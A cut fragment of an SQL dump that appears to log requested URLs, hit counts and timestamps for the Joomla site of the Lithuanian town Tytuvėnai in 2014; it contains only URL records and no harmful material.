00:00:00'),(318,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=48:jaunystei-prisiminti&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',12,0,'2014-05-18 17:13:28','0000-00-00 00:00:00'),(319,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=91:kvieiame--darb-saugos-seminar&option=com_content&view=article','','','',6,0,'2014-05-18 20:00:15','0000-00-00 00:00:00'),(320,'http://tytuvenai.eu/index.php?Itemid=37&catid=32:turizmas&id=56:veriniu-pasaulis&option=com_content&view=article','','','',4,0,'2014-05-18 20:00:16','0000-00-00 00:00:00'),(321,'http://tytuvenai.eu/index.php?Itemid=30&id=35&option=com_content&view=article','','','',6,0,'2014-05-19 00:37:09','0000-00-00 00:00:00'),(322,'http://www.tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&option=com_content&view=article','','','',6,0,'2014-05-19 05:21:07','0000-00-00 00:00:00'),(323,'http://www.tytuvenai.eu/index.php?view=article&id=79&Itemid=69','','','',25,0,'2014-05-19 11:40:13','0000-00-00 00:00:00'),(324,'http://tytuvenai.eu/index.php?option=com_user&view=register','','http://tytuvenai.eu/index.php?option=com_user&view=register','',18,0,'2014-05-19 13:32:25','0000-00-00 00:00:00'),(325,'http://tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=12','','','',11,0,'2014-05-19 22:54:31','0000-00-00 00:00:00'),(326,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=92:tsiasi-tytuvn-bernardin-vienuolyno-atstatymo-darbai&option=com_content&view=article','','','',6,0,'2014-05-20 05:55:16','0000-00-00 00:00:00'),(327,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=99:ki-vakarien-tytuvn-vienuolyne&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',11,0,'2014-05-20 07:00:29','0000-00-00 00:00:00'),(328,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=90:tytuvn-ansamblio-banyios-stogo-keitimo-darbai-pusjo&option=com_content&view=article','','','',6,0,'2014-05-20 13:37:33','0000-00-00 00:00:00'),(329,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=46&Itemid=53','','','',21,0,'2014-05-20 14:59:59','0000-00-00 00:00:00'),(330,'http://tytuvenai.eu/index.php?Itemid=80&catid=41:veikla&id=86:veiklos-srategija&option=com_content&view=article','','','',5,0,'2014-05-20 15:11:28','0000-00-00 00:00:00'),(331,'http://www.tytuvenai.eu/index.php?option=com_adsmanager&task=upload','','','',1,0,'2014-05-20 15:52:03','0000-00-00 00:00:00'),(332,'http://tytuvenai.eu/index.php?option=com_user&view=registration','','http://tytuvenai.eu/index.php?option=com_user&view=registration','',2,0,'2014-05-20 17:50:41','0000-00-00 00:00:00'),(333,'http://tytuvenai.eu/index.php?option=com_user&view=reset','','http://tytuvenai.eu/index.php?option=com_user&view=reset','',3,0,'2014-05-20 22:22:39','0000-00-00 00:00:00'),(334,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=85:europos-paveldo-dienos-2013-qepoch-enklaiq&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',12,0,'2014-05-20 23:00:34','0000-00-00 00:00:00'),(335,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=71:darbo-umokestis&catid=41:veikla&Itemid=57','','','',13,0,'2014-05-21 07:06:20','0000-00-00 00:00:00'),(336,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=100:tytuvn-banyios-ir-vienuolyno-ansamblis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',12,0,'2014-05-21 07:10:56','0000-00-00 00:00:00'),(337,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_n.png','','','',18,0,'2014-05-21 08:32:15','0000-00-00 00:00:00'),(338,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_ne.png','','','',18,0,'2014-05-21 08:32:16','0000-00-00 00:00:00'),(339,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_e.png','','','',18,0,'2014-05-21 08:32:16','0000-00-00 00:00:00'),(340,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_se.png','','','',18,0,'2014-05-21 08:32:16','0000-00-00 00:00:00'),(341,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_s.png','','','',18,0,'2014-05-21 08:32:17','0000-00-00 00:00:00'),(342,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_sw.png','','','',18,0,'2014-05-21 08:32:17','0000-00-00 00:00:00'),(343,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_w.png','','','',18,0,'2014-05-21 08:32:17','0000-00-00 00:00:00'),(344,'http://www.tytuvenai.eu/index.php/fancybox/fancy_shadow_nw.png','','','',18,0,'2014-05-21 08:32:17','0000-00-00 00:00:00'),(345,'http://tytuvenai.eu/index.php?option=com_user&task=register','','http://tytuvenai.eu/index.php?option=com_user&task=register','',2,0,'2014-05-21 12:39:29','0000-00-00 00:00:00'),(346,'http://tytuvenai.eu/index.php?view=article&catid=32:turizmas&id=56:veriniu-pasaulis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=37','','','',11,0,'2014-05-21 13:19:11','0000-00-00 00:00:00'),(347,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=13','','','',17,0,'2014-05-21 20:42:16','0000-00-00 00:00:00'),(348,'http://www.tytuvenai.eu/index.php/lankytini-objektai/kulturos-paveldo-objektai/trackback/','','http://www.tytuvenai.eu/index.php/lankytini-objektai/kulturos-paveldo-objektai','',3,0,'2014-05-22 01:42:41','0000-00-00 00:00:00'),(349,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=48:jaunystei-prisiminti&catid=1:paskutinesnaujienos&Itemid=53','','','',12,0,'2014-05-22 02:32:00','0000-00-00 00:00:00'),(350,'http://www.tytuvenai.eu/index.php?view=article&catid=31:general&id=35:kontaktai&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=30','','','',6,0,'2014-05-22 02:41:05','0000-00-00 00:00:00'),(351,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=98:pildome-vaik-svajones&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-05-22 04:13:17','0000-00-00 00:00:00'),(352,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=86&Itemid=80','','','',21,0,'2014-05-22 08:17:41','0000-00-00 00:00:00'),(353,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=71&Itemid=71','','','',21,0,'2014-05-22 09:20:44','0000-00-00 00:00:00'),(354,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=83:pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',12,0,'2014-05-22 11:03:50','0000-00-00 00:00:00'),(355,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=54:dekojame-uz-aukas&tmpl=component&print=1&layout=default&page=','','','',3,0,'2014-05-22 11:06:28','0000-00-00 00:00:00'),(356,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=55:angelo-gele&catid=32:turizmas&Itemid=37','','','',15,0,'2014-05-22 21:31:58','0000-00-00 00:00:00'),(357,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=56:veriniu-pasaulis&catid=32:turizmas&Itemid=37','','','',16,0,'2014-05-22 21:32:07','0000-00-00 00:00:00'),(358,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=64:pasaulins-turizmo-dienos-minjimas-kelms-rajone&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',13,0,'2014-05-23 13:23:34','0000-00-00 00:00:00'),(359,'http://tytuvenai.eu/index.php?view=article&catid=31:general&id=35:kontaktai&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=62','','','',11,0,'2014-05-23 13:23:38','0000-00-00 00:00:00'),(360,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=91:kvieiame--darb-saugos-seminar&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',13,0,'2014-05-24 01:23:15','0000-00-00 00:00:00'),(361,'http://tytuvenai.eu/index.php?view=article&catid=41:veikla&id=86:veiklos-srategija&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=80','','','',13,0,'2014-05-24 01:23:24','0000-00-00 00:00:00'),(362,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&catid=1:paskutinesnaujienos&Itemid=53','','','',4,0,'2014-05-24 03:48:05','0000-00-00 00:00:00'),(363,'http://www.tytuvenai.eu/index.php/component/content/?id=103&amp','','','',2,0,'2014-05-24 06:19:36','0000-00-00 00:00:00'),(364,'http://tytuvenai.eu/index.php?view=article&catid=41:veikla&id=84:projektai&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=79','','','',13,0,'2014-05-24 07:08:52','0000-00-00 00:00:00'),(365,'http://tytuvenai.eu/index.php?view=article&catid=32:turizmas&id=55:angelo-gele&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=37','','','',12,0,'2014-05-24 09:39:42','0000-00-00 00:00:00'),(366,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=64','','','',4,0,'2014-05-25 01:56:09','0000-00-00 00:00:00'),(367,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=83:pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika&catid=1:paskutinesnaujienos&Itemid=53','','','',10,0,'2014-05-25 22:25:20','0000-00-00 00:00:00'),(368,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=52:advento-sekmadieniai&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',13,0,'2014-05-26 05:15:01','0000-00-00 00:00:00'),(369,'http://tytuvenai.eu/index.php?view=article&catid=34:naujienos&id=46:pasirasyta-sutartis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=34','','','',14,0,'2014-05-26 09:33:40','0000-00-00 00:00:00'),(370,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=98:pildome-vaik-svajones&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',10,0,'2014-05-26 11:04:58','0000-00-00 00:00:00'),(371,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=92:tsiasi-tytuvn-bernardin-vienuolyno-atstatymo-darbai&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',12,0,'2014-05-26 15:05:38','0000-00-00 00:00:00'),(372,'http://tytuvenai.eu/index.php?view=article&catid=31:general&id=35:kontaktai&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=30','','','',12,0,'2014-05-26 21:11:52','0000-00-00 00:00:00'),(373,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=35&Itemid=62','','','',9,0,'2014-05-27 02:57:01','0000-00-00 00:00:00'),(374,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=53:nelaime&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',10,0,'2014-05-27 11:18:05','0000-00-00 00:00:00'),(375,'http://tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','','',54,0,'2014-05-27 13:48:50','0000-00-00 00:00:00'),(376,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=14','','','',3,0,'2014-05-27 23:03:45','0000-00-00 00:00:00'),(377,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=90:tytuvn-ansamblio-banyios-stogo-keitimo-darbai-pusjo&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',13,0,'2014-05-28 05:13:18','0000-00-00 00:00:00'),(378,'http://tytuvenai.eu/index.php?view=article&catid=31:general&id=35%3','','','',4,0,'2014-05-29 11:56:36','0000-00-00 00:00:00'),(379,'http://www.tytuvenai.eu/index.php/component/content/category/51-vienuolynas/vienuolynas','','','',33,0,'2014-05-29 19:29:05','0000-00-00 00:00:00'),(380,'http://www.tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=98:pildome-vaik-svajones&option=com_content&view=article','','','',5,0,'2014-05-30 08:02:35','0000-00-00 00:00:00'),(381,'http://www.tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',6,0,'2014-05-30 08:37:08','0000-00-00 00:00:00'),(382,'http://tytuvenai.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',6,0,'2014-05-30 09:26:48','0000-00-00 00:00:00'),(383,'http://www.tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=85:europos-paveldo-dienos-2013-qepoch-enklaiq&option=com_content&view=article','','','',5,0,'2014-05-31 05:27:22','0000-00-00 00:00:00'),(384,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=47:skaitymai-kapinese&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',9,0,'2014-05-31 06:54:08','0000-00-00 00:00:00'),(385,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=6&option=com_content&view=category','','','',5,0,'2014-05-31 14:24:58','0000-00-00 00:00:00'),(386,'http://www.tytuvenai.eu/index.php?view=article&catid=34:naujienos&id=46:pasirasyta-sutartis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',2,0,'2014-05-31 15:15:07','0000-00-00 00:00:00'),(387,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=14&option=com_content&view=category','','','',5,0,'2014-06-01 10:59:04','0000-00-00 00:00:00'),(388,'http://tytuvenai.euhttp//tytuvenai.eu/','','','',2,0,'2014-06-01 11:46:16','0000-00-00 00:00:00'),(389,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=98:pildome-vaik-svajones&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',1,0,'2014-06-01 11:53:58','0000-00-00 00:00:00'),(390,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=56&Itemid=66','','','',11,0,'2014-06-01 21:22:22','0000-00-00 00:00:00'),(391,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=100:tytuvn-banyios-ir-vienuolyno-ansamblis&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',1,0,'2014-06-01 21:42:38','0000-00-00 00:00:00'),(392,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=54:dekojame-uz-aukas&option=com_content&view=article','','','',5,0,'2014-06-02 02:27:23','0000-00-00 00:00:00'),(393,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=21&option=com_content&view=category','','','',5,0,'2014-06-02 05:42:09','0000-00-00 00:00:00'),(394,'http://www.tytuvenai.eu/index.php?Itemid=80&id=86&option=com_content&view=article','','','',5,0,'2014-06-02 11:12:39','0000-00-00 00:00:00'),(395,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=107:tytuvn-ansambliui-400-met&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-06-02 14:40:39','0000-00-00 00:00:00'),(396,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=8','','','',2,0,'2014-06-02 23:35:25','0000-00-00 00:00:00'),(397,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=90:tytuvn-ansamblio-banyios-stogo-keitimo-darbai-pusjo&catid=1:paskutinesnaujienos&Itemid=53','','','',6,0,'2014-06-03 06:15:15','0000-00-00 00:00:00'),(398,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=28&option=com_content&view=category','','','',5,0,'2014-06-04 17:19:43','0000-00-00 00:00:00'),(399,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=4&option=com_content&view=category','','','',5,0,'2014-06-04 17:29:51','0000-00-00 00:00:00'),(400,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=52:advento-sekmadieniai&option=com_content&view=article','','','',5,0,'2014-06-05 03:05:03','0000-00-00 00:00:00'),(401,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=71:darbo-umokestis&catid=41:veikla&Itemid=71','','','',5,0,'2014-06-05 07:16:36','0000-00-00 00:00:00'),(402,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=47:skaitymai-kapinese&option=com_content&view=article','','','',5,0,'2014-06-05 15:36:02','0000-00-00 00:00:00'),(403,'http://www.tytuvenai.eu/index.php/lankytini-objektai/gamtos-paminklai','','','',42,0,'2014-06-05 23:37:23','0000-00-00 00:00:00'),(404,'http://tytuvenai.eu/index.php?Itemid=57&catid=41:veikla&id=71:darbo-umokestis&option=com_content&view=article','','','',5,0,'2014-06-06 02:11:27','0000-00-00 00:00:00'),(405,'http://www.tytuvenai.eu/index.php/component/content/category/47-piligrimai/piligrimai','','','',25,0,'2014-06-06 05:06:41','0000-00-00 00:00:00'),(406,'http://tytuvenai.eu/index.php?Itemid=79&catid=41:veikla&id=84:projektai&option=com_content&view=article','','','',5,0,'2014-06-06 07:04:17','0000-00-00 00:00:00'),(407,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=2&option=com_content&view=category','','','',5,0,'2014-06-06 16:18:52','0000-00-00 00:00:00'),(408,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=53:nelaime&option=com_content&view=article','','','',5,0,'2014-06-07 06:27:49','0000-00-00 00:00:00'),(409,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=12&option=com_content&view=category','','','',6,0,'2014-06-07 09:26:03','0000-00-00 00:00:00'),(410,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=86:veiklos-srategija&catid=41:veikla&Itemid=80','','','',5,0,'2014-06-07 11:49:16','0000-00-00 00:00:00'),(411,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=10&option=com_content&view=category','','','',5,0,'2014-06-08 01:00:18','0000-00-00 00:00:00'),(412,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=8&option=com_content&view=category','','','',5,0,'2014-06-08 04:12:30','0000-00-00 00:00:00'),(413,'http://tytuvenai.eu/index.php?Itemid=53&catid=1:paskutinesnaujienos&id=48:jaunystei-prisiminti&option=com_content&view=article','','','',5,0,'2014-06-08 14:57:17','0000-00-00 00:00:00'),(414,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_n.png','','','',1,0,'2014-06-08 18:38:41','0000-00-00 00:00:00'),(415,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_ne.png','','','',1,0,'2014-06-08 18:38:42','0000-00-00 00:00:00'),(416,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_e.png','','','',1,0,'2014-06-08 18:38:42','0000-00-00 00:00:00'),(417,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_se.png','','','',1,0,'2014-06-08 18:38:42','0000-00-00 00:00:00'),(418,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_s.png','','','',1,0,'2014-06-08 18:38:43','0000-00-00 00:00:00'),(419,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_sw.png','','','',1,0,'2014-06-08 18:38:43','0000-00-00 00:00:00'),(420,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_w.png','','','',1,0,'2014-06-08 18:38:43','0000-00-00 00:00:00'),(421,'http://www.tytuvenai.eu/index.php/turizmo-informacija/fancybox/fancy_shadow_nw.png','','','',1,0,'2014-06-08 18:38:44','0000-00-00 00:00:00'),(422,'http://tytuvenai.eu/index.php/lankytini-objektai/gamtos-paminklai','','','',20,0,'2014-06-08 19:57:21','0000-00-00 00:00:00'),(423,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=53:nelaime&catid=1:paskutinesnaujienos&Itemid=53','','','',8,0,'2014-06-09 17:49:52','0000-00-00 00:00:00'),(424,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54:dekojame-uz-aukas&catid=1:paskutinesnaujienos&Itemid=53','','','',8,0,'2014-06-11 05:34:15','0000-00-00 00:00:00'),(425,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&option=com_content&view=category','','','',5,0,'2014-06-11 18:13:05','0000-00-00 00:00:00'),(426,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=53:nelaime&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=55','','','',2,0,'2014-06-13 02:36:22','0000-00-00 00:00:00'),(427,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=46&Itemid=61','','','',4,0,'2014-06-13 09:27:26','0000-00-00 00:00:00'),(428,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=55&Itemid=54','','','',1,0,'2014-06-13 09:27:26','0000-00-00 00:00:00'),(429,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=56&Itemid=66','','','',3,0,'2014-06-15 04:20:18','0000-00-00 00:00:00'),(430,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=48:tytuvenu-istorija&catid=35:naujienos&Itemid=62','','','',1,0,'2014-06-15 07:17:03','0000-00-00 00:00:00'),(431,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=5','','','',2,0,'2014-06-15 19:38:19','0000-00-00 00:00:00'),(432,'http://www.tytuvenai.eu/index.php?view=article&catid=31:general&id=35%3..','','','',6,0,'2014-06-16 06:30:51','0000-00-00 00:00:00'),(433,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_n.png','','','',17,0,'2014-06-17 15:09:09','0000-00-00 00:00:00'),(434,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_ne.png','','','',17,0,'2014-06-17 15:09:09','0000-00-00 00:00:00'),(435,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_e.png','','','',17,0,'2014-06-17 15:09:09','0000-00-00 00:00:00'),(436,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_se.png','','','',17,0,'2014-06-17 15:09:09','0000-00-00 00:00:00'),(437,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_s.png','','','',17,0,'2014-06-17 15:09:10','0000-00-00 00:00:00'),(438,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_sw.png','','','',17,0,'2014-06-17 15:09:10','0000-00-00 00:00:00'),(439,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_w.png','','','',17,0,'2014-06-17 15:09:10','0000-00-00 00:00:00'),(440,'http://www.tytuvenai.eu/index.php/lankytini-objektai/fancybox/fancy_shadow_nw.png','','','',17,0,'2014-06-17 15:09:10','0000-00-00 00:00:00'),(441,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_n.png','','','',7,0,'2014-06-17 15:12:17','0000-00-00 00:00:00'),(442,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_ne.png','','','',7,0,'2014-06-17 15:12:17','0000-00-00 00:00:00'),(443,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_e.png','','','',7,0,'2014-06-17 15:12:17','0000-00-00 00:00:00'),(444,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_se.png','','','',7,0,'2014-06-17 15:12:18','0000-00-00 00:00:00'),(445,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_s.png','','','',7,0,'2014-06-17 15:12:18','0000-00-00 00:00:00'),(446,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_sw.png','','','',7,0,'2014-06-17 15:12:18','0000-00-00 00:00:00'),(447,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_w.png','','','',7,0,'2014-06-17 15:12:19','0000-00-00 00:00:00'),(448,'http://www.tytuvenai.eu/index.php/apgyvendinimas/fancybox/fancy_shadow_nw.png','','','',7,0,'2014-06-17 15:12:19','0000-00-00 00:00:00'),(449,'http://www.tytuvenai.eu/index.php?view=article&catid=31:general&id=35%3...','','','',2,0,'2014-06-18 17:23:14','0000-00-00 00:00:00'),(450,'http://tytuvenai.eu/index.php/component/content/article/19-sample-data-article/demo/courses/','','','',10,0,'2014-06-19 01:06:21','0000-00-00 00:00:00'),(451,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=97:pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-06-19 17:40:53','0000-00-00 00:00:00'),(452,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=99:ki-vakarien-tytuvn-vienuolyne&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-06-19 17:40:59','0000-00-00 00:00:00'),(453,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=98:pildome-vaik-svajones&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-06-19 17:45:06','0000-00-00 00:00:00'),(454,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=100:tytuvn-banyios-ir-vienuolyno-ansamblis&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-06-19 17:51:42','0000-00-00 00:00:00'),(455,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=71:darbo-umokestis&catid=41:veikla&Itemid=71','','','',1,0,'2014-06-19 17:55:33','0000-00-00 00:00:00'),(456,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=86:veiklos-srategija&catid=41:veikla&Itemid=80','','','',1,0,'2014-06-19 18:00:14','0000-00-00 00:00:00'),(457,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=83:pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-06-19 18:02:28','0000-00-00 00:00:00'),(458,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=85:europos-paveldo-dienos-2013-qepoch-enklaiq&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-06-19 18:19:45','0000-00-00 00:00:00'),(459,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=54:dekojame-uz-aukas&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-06-19 18:31:35','0000-00-00 00:00:00'),(460,'http://www.tytuvenai.eu./index.php?option=com_content&view=article&id=84:projektai&catid=41:veikla&Itemid=79','','','',1,0,'2014-06-19 18:35:29','0000-00-00 00:00:00'),(461,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=52&Itemid=63','','','',3,0,'2014-06-20 05:00:49','0000-00-00 00:00:00'),(462,'http://infotytuvenai.lt/index.php/component/content/category/index.php/apie-centra/ekskursijos','','','',24,0,'2014-06-24 18:12:36','0000-00-00 00:00:00'),(463,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=3','','','',4,0,'2014-06-25 17:06:17','0000-00-00 00:00:00'),(464,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=107:tytuvn-ansambliui-400-met&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',9,0,'2014-06-27 14:59:17','0000-00-00 00:00:00'),(465,'http://www.infotytuvenai.lt/index.php/component/content/?id=103&Itemid=82','','','',69,0,'2014-06-29 03:55:56','0000-00-00 00:00:00'),(466,'http://tytuvenai.eu/index.php?view=article&catid=32:turizmas&id=55','','','',1,0,'2014-06-29 04:43:37','0000-00-00 00:00:00'),(467,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=48:jaunystei-prisiminti&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=62','','','',3,0,'2014-06-29 14:42:02','0000-00-00 00:00:00'),(468,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=46&Itemid=61','','','',7,0,'2014-07-01 04:15:22','0000-00-00 00:00:00'),(469,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=7','','','',5,0,'2014-07-02 08:34:18','0000-00-00 00:00:00'),(470,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=17','','','',4,0,'2014-07-02 08:36:06','0000-00-00 00:00:00'),(471,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=1','','','',4,0,'2014-07-02 21:24:40','0000-00-00 